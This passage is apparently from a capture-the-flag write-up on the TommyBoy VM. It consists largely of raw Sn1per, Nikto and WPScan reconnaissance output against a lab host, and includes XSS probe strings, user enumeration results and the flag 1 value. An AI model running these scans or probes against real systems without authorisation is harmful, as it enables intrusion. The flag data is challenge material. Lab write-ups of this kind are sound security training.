<p>The requested method TRACE is not allowed for the URL /.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 80</address>
</body></html>

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2016 21:46:15 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 08 Jul 2016 13:24:23 GMT
ETag: "498-5371fb88ff1d8"
Accept-Ranges: bytes
Content-Length: 1176
Vary: Accept-Encoding
Content-Type: text/html

<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
If your'e reading this, the Callahan Auto customer ordering system is down.  Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment fr

 + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
+ -- --=[Checking if X-Content options are enabled on 192.168.1.23... 

+ -- --=[Checking if X-Frame options are enabled on 192.168.1.23... 

+ -- --=[Checking if X-XSS-Protection header is enabled on 192.168.1.23... 

+ -- --=[Checking HTTP methods on 192.168.1.23... 
Allow: OPTIONS,GET,HEAD,POST

+ -- --=[Checking if TRACE method is enabled on 192.168.1.23... 

+ -- --=[Checking for open proxy on 192.168.1.23... 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /.testing/openproxy.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at crowdshield.com Port 80</address>
</body></html>

+ -- --=[Enumerating software on 192.168.1.23... 
Server: Apache/2.4.18 (Ubuntu)

+ -- --=[Checking if Strict-Transport-Security is enabled on 192.168.1.23... 

+ -- --=[Checking for Flash cross-domain policy on 192.168.1.23... 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /crossdomain.xml was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 80</address>
</body></html>

+ -- --=[Checking for Silverlight cross-domain policy on 192.168.1.23... 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 80</address>
</body></html>

+ -- --=[Checking for HTML5 cross-origin resource sharing on 192.168.1.23... 

+ -- --=[Retrieving robots.txt on 192.168.1.23... 
User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt

+ -- --=[Retrieving sitemap.xml on 192.168.1.23... 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /sitemap.xml was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 80</address>
</body></html>

+ -- --=[Checking cookie attributes on 192.168.1.23... 

+ -- --=[Checking for ASP.NET Detailed Errors on 192.168.1.23... 


 + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.23
+ Target Hostname:    192.168.1.23
+ Target Port:        80
+ Start Time:         2016-10-02 23:46:00 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x498 0x5371fb88ff1d8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /webcgi/: Directory indexing found.
+ OSVDB-3268: /cgi/: Directory indexing found.
+ OSVDB-3268: /cgi-bin/: Directory indexing found.
+ OSVDB-3268: /cgi-sys/: Directory indexing found.
+ OSVDB-3268: /cgibin/: Directory indexing found.
+ OSVDB-3268: /cgi-win/: Directory indexing found.
+ OSVDB-3268: /fcgi-bin/: Directory indexing found.
+ OSVDB-3268: /cgi-exe/: Directory indexing found.
+ Entry '/6packsofb...soda' in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ OSVDB-3268: /iisadmin/: Directory indexing found.
+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.
+ OSVDB-3268: /webmail/: Directory indexing found.
+ /webmail/: Web based mail package installed.
+ OSVDB-3268: /search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>: Directory indexing found.
+ OSVDB-3268: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: Directory indexing found.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-3268: /ariadne/: Directory indexing found.
+ /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
+ OSVDB-3268: /manager/: Directory indexing found.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3268: /web/: Directory indexing found.
+ OSVDB-3268: /publisher/: Directory indexing found.
+ OSVDB-1264: /publisher/: Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0237.
+ OSVDB-3268: /photo/: Directory indexing found.
+ OSVDB-2695: /photo/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
+ OSVDB-3268: /pdf/: Directory indexing found.
+ OSVDB-3268: /acceso/: Directory indexing found.
+ OSVDB-3092: /acceso/: This might be interesting...
+ OSVDB-3268: /access/: Directory indexing found.
+ OSVDB-3092: /access/: This might be interesting...
+ OSVDB-3268: /acciones/: Directory indexing found.
+ OSVDB-3092: /acciones/: This might be interesting...
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /Administration/: Directory indexing found.
+ OSVDB-3092: /Administration/: This might be interesting...
+ OSVDB-3268: /administrator/: Directory indexing found.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3268: /analog/: Directory indexing found.
+ OSVDB-3092: /analog/: This might be interesting...
+ OSVDB-3268: /archivar/: Directory indexing found.
+ OSVDB-3092: /archivar/: This might be interesting...
+ OSVDB-3268: /archive/: Directory indexing found.
+ OSVDB-3092: /archive/: This might be interesting...
+ OSVDB-3268: /archivo/: Directory indexing found.
+ OSVDB-3092: /archivo/: This might be interesting...
+ OSVDB-3268: /backup/: Directory indexing found.
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /banca/: Directory indexing found.
+ OSVDB-3092: /banca/: This might be interesting...
+ OSVDB-3268: /banco/: Directory indexing found.
+ OSVDB-3092: /banco/: This might be interesting...
+ OSVDB-3268: /bdata/: Directory indexing found.
+ OSVDB-3092: /bdata/: This might be interesting...
+ OSVDB-3268: /bdatos/: Directory indexing found.
+ OSVDB-3092: /bdatos/: This might be interesting...
+ OSVDB-3268: /beta/: Directory indexing found.
+ OSVDB-3092: /beta/: This might be interesting...
+ OSVDB-3268: /c/: Directory indexing found.
+ OSVDB-3092: /c/: This might be interesting...
+ OSVDB-3268: /caja/: Directory indexing found.
+ OSVDB-3092: /caja/: This might be interesting...
+ OSVDB-3268: /cards/: Directory indexing found.
+ OSVDB-3092: /cards/: This might be interesting...
+ OSVDB-3268: /cart/: Directory indexing found.
+ OSVDB-3092: /cart/: This might be interesting...
+ OSVDB-3268: /cdrom/: Directory indexing found.
+ OSVDB-3092: /cdrom/: This might be interesting...
+ OSVDB-3268: /cert/: Directory indexing found.
+ OSVDB-3092: /cert/: This might be interesting...
+ OSVDB-3268: /cliente/: Directory indexing found.
+ OSVDB-3092: /cliente/: This might be interesting...
+ OSVDB-3268: /compra/: Directory indexing found.
+ OSVDB-3092: /compra/: This might be interesting...
+ OSVDB-3268: /compras/: Directory indexing found.
+ OSVDB-3092: /compras/: This might be interesting...
+ OSVDB-3268: /compressed/: Directory indexing found.
+ OSVDB-3092: /compressed/: This might be interesting...
+ OSVDB-3268: /conecta/: Directory indexing found.
+ OSVDB-3092: /conecta/: This might be interesting...
+ OSVDB-3268: /counter/: Directory indexing found.
+ OSVDB-3268: /cuenta/: Directory indexing found.
+ OSVDB-3092: /cuenta/: This might be interesting...
+ OSVDB-3268: /cuentas/: Directory indexing found.
+ OSVDB-3092: /cuentas/: This might be interesting...
+ OSVDB-3268: /dato/: Directory indexing found.
+ OSVDB-3092: /dato/: This might be interesting...
+ OSVDB-3268: /db/: Directory indexing found.
+ OSVDB-3092: /db/: This might be interesting...
+ OSVDB-3268: /demo/: Directory indexing found.
+ OSVDB-3092: /demo/: This might be interesting...
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3268: /devel/: Directory indexing found.
+ OSVDB-3092: /devel/: This might be interesting...
+ OSVDB-3268: /directory/: Directory indexing found.
+ OSVDB-3092: /directory/: This might be interesting...
+ OSVDB-3268: /down/: Directory indexing found.
+ OSVDB-3092: /down/: This might be interesting...
+ OSVDB-3268: /download/: Directory indexing found.
+ OSVDB-3092: /download/: This might be interesting...
+ OSVDB-3268: /downloads/: Directory indexing found.
+ OSVDB-3092: /downloads/: This might be interesting...
+ OSVDB-3268: /ejemplo/: Directory indexing found.
+ OSVDB-3092: /ejemplo/: This might be interesting...
+ OSVDB-3268: /ejemplos/: Directory indexing found.
+ OSVDB-3092: /ejemplos/: This might be interesting...
+ OSVDB-3268: /envia/: Directory indexing found.
+ OSVDB-3092: /envia/: This might be interesting...
+ OSVDB-3268: /file/: Directory indexing found.
+ OSVDB-3092: /file/: This might be interesting...
+ OSVDB-3268: /fileadmin/: Directory indexing found.
+ OSVDB-3092: /fileadmin/: This might be interesting...
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3268: /foto/: Directory indexing found.
+ OSVDB-3092: /foto/: This might be interesting...
+ OSVDB-3268: /graphics/: Directory indexing found.
+ OSVDB-3092: /graphics/: This might be interesting...
+ OSVDB-3268: /guestbook/: Directory indexing found.
+ OSVDB-3092: /guestbook/: This might be interesting...
+ OSVDB-3268: /guests/: Directory indexing found.
+ OSVDB-3092: /guests/: This might be interesting...
+ OSVDB-3268: /hidden/: Directory indexing found.
+ OSVDB-3092: /hidden/: This might be interesting...
+ OSVDB-3268: /home/: Directory indexing found.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3268: /homepage/: Directory indexing found.
+ OSVDB-3092: /homepage/: This might be interesting...
+ OSVDB-3268: /import/: Directory indexing found.
+ OSVDB-3092: /import/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3268: /informacion/: Directory indexing found.
+ OSVDB-3092: /informacion/: This might be interesting...
+ OSVDB-3268: /ingresa/: Directory indexing found.
+ OSVDB-3092: /ingresa/: This might be interesting...
+ OSVDB-3268: /ingreso/: Directory indexing found.
+ OSVDB-3092: /ingreso/: This might be interesting...
+ OSVDB-3268: /internal/: Directory indexing found.
+ OSVDB-3092: /internal/: This might be interesting...
+ OSVDB-3268: /intranet/: Directory indexing found.
+ OSVDB-3092: /intranet/: This might be interesting...
+ OSVDB-3268: /invitado/: Directory indexing found.
+ OSVDB-3092: /invitado/: This might be interesting...
+ OSVDB-3268: /invitados/: Directory indexing found.
+ OSVDB-3092: /invitados/: This might be interesting...
+ OSVDB-3268: /java/: Directory indexing found.
+ OSVDB-3092: /java/: This might be interesting...
+ OSVDB-3268: /job/: Directory indexing found.
+ OSVDB-3092: /job/: This might be interesting...
+ OSVDB-3268: /jrun/: Directory indexing found.
+ OSVDB-3092: /jrun/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3268: /library/: Directory indexing found.
+ OSVDB-3092: /library/: This might be interesting...
+ OSVDB-3268: /linux/: Directory indexing found.
+ OSVDB-3092: /linux/: This might be interesting...
+ OSVDB-3268: /logfiles/: Directory indexing found.
+ OSVDB-3092: /logfiles/: This might be interesting...
+ OSVDB-3268: /logger/: Directory indexing found.
+ OSVDB-3092: /logger/: This might be interesting...
+ OSVDB-3268: /login/: Directory indexing found.
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /movimientos/: Directory indexing found.
+ OSVDB-3092: /movimientos/: This might be interesting...
+ OSVDB-3268: /mp3/: Directory indexing found.
+ OSVDB-3092: /mp3/: This might be interesting...
+ OSVDB-3268: /mqseries/: Directory indexing found.
+ OSVDB-3092: /mqseries/: This might be interesting...
+ OSVDB-3268: /old/: Directory indexing found.
+ OSVDB-3092: /old/: This might be interesting...
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /private/: Directory indexing found.
+ OSVDB-3092: /private/: This might be interesting...
+ OSVDB-3268: /prueba/: Directory indexing found.
+ OSVDB-3092: /prueba/: This might be interesting...
+ OSVDB-3268: /pruebas/: Directory indexing found.
+ OSVDB-3092: /pruebas/: This might be interesting...
+ OSVDB-3268: /publica/: Directory indexing found.
+ OSVDB-3092: /publica/: This might be interesting...
+ OSVDB-3268: /publico/: Directory indexing found.
+ OSVDB-3092: /publico/: This might be interesting...
+ OSVDB-3268: /purchase/: Directory indexing found.
+ OSVDB-3092: /purchase/: This might be interesting...
+ OSVDB-3268: /register/: Directory indexing found.
+ OSVDB-3092: /register/: This might be interesting...
+ OSVDB-3268: /registered/: Directory indexing found.
+ OSVDB-3092: /registered/: This might be interesting...
+ OSVDB-3268: /reports/: Directory indexing found.
+ OSVDB-3092: /reports/: This might be interesting...
+ OSVDB-3268: /root/: Directory indexing found.
+ OSVDB-3268: /save/: Directory indexing found.
+ OSVDB-3092: /save/: This might be interesting...
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /server_stats/: Directory indexing found.
+ OSVDB-3268: /servicio/: Directory indexing found.
+ OSVDB-3092: /servicio/: This might be interesting...
+ OSVDB-3268: /shop/: Directory indexing found.
+ OSVDB-3092: /shop/: This might be interesting...
+ OSVDB-3268: /source/: Directory indexing found.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3268: /ssi/: Directory indexing found.
+ OSVDB-3268: /staff/: Directory indexing found.
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3268: /stat/: Directory indexing found.
+ OSVDB-3092: /stat/: This might be interesting...
+ OSVDB-3268: /Statistics/: Directory indexing found.
+ OSVDB-3092: /Statistics/: This might be interesting...
+ OSVDB-3268: /statistics/: Directory indexing found.
+ OSVDB-3092: /statistics/: This might be interesting...
+ OSVDB-3268: /Stats/: Directory indexing found.
+ OSVDB-3092: /Stats/: This might be interesting...
+ OSVDB-3268: /store/: Directory indexing found.
+ OSVDB-3092: /store/: This might be interesting...
+ OSVDB-3268: /stylesheets/: Directory indexing found.
+ OSVDB-3092: /stylesheets/: This might be interesting...
+ OSVDB-3268: /subir/: Directory indexing found.
+ OSVDB-3092: /subir/: This might be interesting...
+ OSVDB-3268: /sys/: Directory indexing found.
+ OSVDB-3092: /sys/: This might be interesting...
+ OSVDB-3268: /system/: Directory indexing found.
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3268: /temp/: Directory indexing found.
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3268: /template/: Directory indexing found.
+ OSVDB-3092: /template/: This may be interesting as the directory may hold sensitive files or reveal system information.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3268: /tests/: Directory indexing found.
+ OSVDB-3092: /tests/: This might be interesting...
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3268: /trabajo/: Directory indexing found.
+ OSVDB-3092: /trabajo/: This might be interesting...
+ OSVDB-3268: /transito/: Directory indexing found.
+ OSVDB-3092: /transito/: This might be interesting...
+ OSVDB-3268: /user/: Directory indexing found.
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3268: /ustats/: Directory indexing found.
+ OSVDB-3092: /ustats/: This might be interesting...
+ OSVDB-3268: /usuario/: Directory indexing found.
+ OSVDB-3092: /usuario/: This might be interesting...
+ OSVDB-3268: /vfs/: Directory indexing found.
+ OSVDB-3092: /vfs/: This might be interesting...
+ OSVDB-3092: /web/: This might be interesting...
+ OSVDB-3268: /webadmin/: Directory indexing found.
+ OSVDB-3092: /webadmin/: This might be interesting...may be HostingController, www.hostingcontroller.com
+ OSVDB-3268: /webboard/: Directory indexing found.
+ OSVDB-3092: /webboard/: This might be interesting...
+ OSVDB-3268: /webcart/: Directory indexing found.
+ OSVDB-3092: /webcart/: This might be interesting...
+ OSVDB-3268: /webdata/: Directory indexing found.
+ OSVDB-3092: /webdata/: This might be interesting...
+ OSVDB-3268: /work/: Directory indexing found.
+ OSVDB-3092: /work/: This might be interesting...
+ OSVDB-3268: /wwwlog/: Directory indexing found.
+ OSVDB-3092: /wwwlog/: This might be interesting...
+ OSVDB-3092: /webcgi/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi-bin/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi-sys/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgibin/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi-win/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /fcgi-bin/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /cgi-exe/: This might be interesting... possibly a system shell found.
+ OSVDB-3268: /market/: Directory indexing found.
+ OSVDB-17670: /market/: Site Server sample files.  This might be interesting.
+ OSVDB-3268: /databases/: Directory indexing found.
+ OSVDB-3092: /databases/: Databases? Really??
+ OSVDB-3092: /manager/: May be a web server or site manager.
+ OSVDB-3268: /search/: Directory indexing found.
+ OSVDB-3268: /a/: Directory indexing found.
+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
+ OSVDB-3268: /image/: Directory indexing found.
+ OSVDB-3268: /perl/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3268: /style/: Directory indexing found.
+ OSVDB-3268: /jsp-examples/: Directory indexing found.
+ OSVDB-3268: /pdfs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /ad/: Directory indexing found.
+ OSVDB-3092: /ad/: This might be interesting... potential country code (Andorra)
+ OSVDB-3268: /ar/: Directory indexing found.
+ OSVDB-3092: /ar/: This might be interesting... potential country code (Argentina)
+ OSVDB-3268: /au/: Directory indexing found.
+ OSVDB-3092: /au/: This might be interesting... potential country code (Australia)
+ OSVDB-3268: /bb/: Directory indexing found.
+ OSVDB-3092: /bb/: This might be interesting... potential country code (Barbados)
+ OSVDB-3268: /cn/: Directory indexing found.
+ OSVDB-3092: /cn/: This might be interesting... potential country code (China)
+ OSVDB-3268: /fr/: Directory indexing found.
+ OSVDB-3092: /fr/: This might be interesting... potential country code (France)
+ OSVDB-3268: /gr/: Directory indexing found.
+ OSVDB-3092: /gr/: This might be interesting... potential country code (Greece)
+ OSVDB-3268: /in/: Directory indexing found.
+ OSVDB-3092: /in/: This might be interesting... potential country code (India)
+ OSVDB-3268: /id/: Directory indexing found.
+ OSVDB-3092: /id/: This might be interesting... potential country code (Indonesia)
+ OSVDB-3268: /im/: Directory indexing found.
+ OSVDB-3092: /im/: This might be interesting... potential country code (Isle Of Man)
+ OSVDB-3268: /it/: Directory indexing found.
+ OSVDB-3092: /it/: This might be interesting... potential country code (Italy)
+ OSVDB-3268: /jp/: Directory indexing found.
+ OSVDB-3092: /jp/: This might be interesting... potential country code (Japan)
+ OSVDB-3268: /my/: Directory indexing found.
+ OSVDB-3092: /my/: This might be interesting... potential country code (Malaysia)
+ OSVDB-3268: /me/: Directory indexing found.
+ OSVDB-3092: /me/: This might be interesting... potential country code (Montenegro)
+ OSVDB-3268: /ms/: Directory indexing found.
+ OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
+ OSVDB-3268: /ps/: Directory indexing found.
+ OSVDB-3092: /ps/: This might be interesting... potential country code (Palestinian Territory)
+ OSVDB-3268: /bl/: Directory indexing found.
+ OSVDB-3092: /bl/: This might be interesting... potential country code (Saint BarthÉlemy)
+ OSVDB-3268: /st/: Directory indexing found.
+ OSVDB-3092: /st/: This might be interesting... potential country code (Sao Tome And Principe)
+ OSVDB-3268: /configuration/: Directory indexing found.
+ /configuration/: Admin login page/section found.
+ OSVDB-3268: /sysadmin/: Directory indexing found.
+ /sysadmin/: Admin login page/section found.
+ OSVDB-3268: /servlets-examples/: Directory indexing found.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ OSVDB-3268: /cms/: Directory indexing found.
+ OSVDB-3092: /cms/: This might be interesting...
+ OSVDB-3268: /phpMyAdmin/: Directory indexing found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3268: /home/?vhelp: Directory indexing found.
+ OSVDB-3268: /snoop/: Directory indexing found.
+ OSVDB-3268: /debug/: Directory indexing found.
+ /debug/: Possible debug directory/program found.
+ OSVDB-3268: /~ftp/: Directory indexing found.
+ OSVDB-637: /~ftp/: Allowed to browse ftp user's home directory.
+ OSVDB-3268: /webmail/?admin: Directory indexing found.
+ 14027 requests: 0 error(s) and 348 item(s) reported on remote host
+ End Time:           2016-10-02 23:46:17 (GMT2) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.18) are not in
      the Nikto database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? no
 + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
[+] Screenshot saved to /usr/share/sniper/loot/192.168.1.23-port80.jpg
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 111 closed... skipping.
 + -- --=[Port 135 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 443 closed... skipping.
 + -- --=[Port 445 closed... skipping.
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 2049 closed... skipping.
 + -- --=[Port 2121 closed... skipping.
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3310 closed... skipping.
 + -- --=[Port 3128 closed... skipping.
 + -- --=[Port 3389 closed... skipping.
 + -- --=[Port 3632 closed... skipping.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5800 closed... skipping.
 + -- --=[Port 5900 closed... skipping.
 + -- --=[Port 6000 closed... skipping.
 + -- --=[Port 6667 closed... skipping.
 + -- --=[Port 8000 closed... skipping.
 + -- --=[Port 8100 closed... skipping.
 + -- --=[Port 8080 closed... skipping.
 + -- --=[Port 8180 closed... skipping.
 + -- --=[Port 8443 closed... skipping.
 + -- --=[Port 8888 closed... skipping.
 + -- --=[Port 10000 closed... skipping.
 + -- --=[Port 49152 closed... skipping.
 + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
yasuo.rb:25:in `require': cannot load such file -- nmap/program (LoadError)
    from yasuo.rb:25:in `<main>'
 + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[Sorting loot directory (/usr/share/sniper/loot)
 + -- --=[Generating reports...
 + -- --=[Opening loot directory...
 + -- --=[Done!
 + -- ----------------------------=[Done]=------------------------------------ -- +


That is quite some output. The web service looks like a sieve. SSH has been checked for some standard logins and came up empty. I don’t have any verified users at the moment, so starting a brute-force now seems an unnecessary waste. First I’ll check the links in robots.txt.

User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt


These lead to three images and flag 1. The images contain nothing useful, just lulz.

» Flag #1

This is the first of five flags in the Callhan Auto server.  You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

Sn1per also hints at a couple of comments in the source of the home-page.

<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget?  Thanks-->


The number of directory listings found actually bugs me. I check some of the dirs but find no content, so it’s just a big empty website.
Following the YouTube link we get our next destination: prehistoricforest/. But it gives me the following error:

Error establishing a database connection


I started this VM late last night, and when I hit this error I tried all sorts of things to work out what caused it and whether the error was by design. I got tired and called it quits. When I booted the whole shebang up again the next day, the TommyBoy console had changed from orange to plain white. Hmmkay…

tommyboot2

Let’s check…

blog

Couldn’t have said it better myself. I did reboot the VM, but it was a reboot of the ESX 6 host that solved the issue. Strange behaviour, maybe due to the hardware version conversion. Now that the blog is up and running we can dig for that sensitive info. Run WPScan first.

[*] exec: wpscan --url http://192.168.1.23/prehistoricforest/ --enumerate u

_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.1.23/prehistoricforest/
[+] Started: Tue Oct  4 19:46:25 2016

[!] The WordPress 'http://192.168.1.23/prehistoricforest/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://192.168.1.23/prehistoricforest/xmlrpc.php
[!] Includes directory has directory listing enabled: http://192.168.1.23/prehistoricforest/wp-includes/

[+] WordPress version 4.5.4 identified from advanced fingerprinting (Released on 2016-09-07)

[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2
 |  Location: http://192.168.1.23/prehistoricforest/wp-content/themes/twentysixteen/
 |  Readme: http://192.168.1.23/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
[!] The version is out of date, the latest version is 1.3
 |  Style URL: http://192.168.1.23/prehistoricforest/wp-content/themes/twentysixteen/style.css
 |  Theme Name: Twenty Sixteen
 |  Theme URI: https://wordpress.org/themes/twentysixteen/
 |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 4 user/s:
    +----+----------+-------------------+
    | Id | Login    | Name              |
    +----+----------+-------------------+
    | 1  | richard  | richard           |
    | 2  | tom      | Big Tom           |
    | 3  | tommy    | Tom Jr.           |
    | 4  | michelle | Michelle Michelle |
    +----+----------+-------------------+

[+] Finished: Tue Oct  4 19:46:29 2016
[+] Requests Done: 53
[+] Memory used: 15.539 MB
[+] Elapsed time: 00:00:04


Very interesting: it found 4 users. Keep that for later. Moving on to the rest of what is on there. First post on the site:

 1 thought on “SON OF A!”

    richard says:	
    July 7, 2016 at 6:04 pm
    Hey numbnuts, look at the /richard folder on this server. I’m sure that picture will jog your memory.
    Since you have a small brain: see up top in the address bar thingy? Erase “/prehistoricforest” and put “/richard” there instead.


So we get another dir to look at. But first I want to finish looking at this site.
I find a password-protected post and Flag #2! Yay me!1!

Sad company news

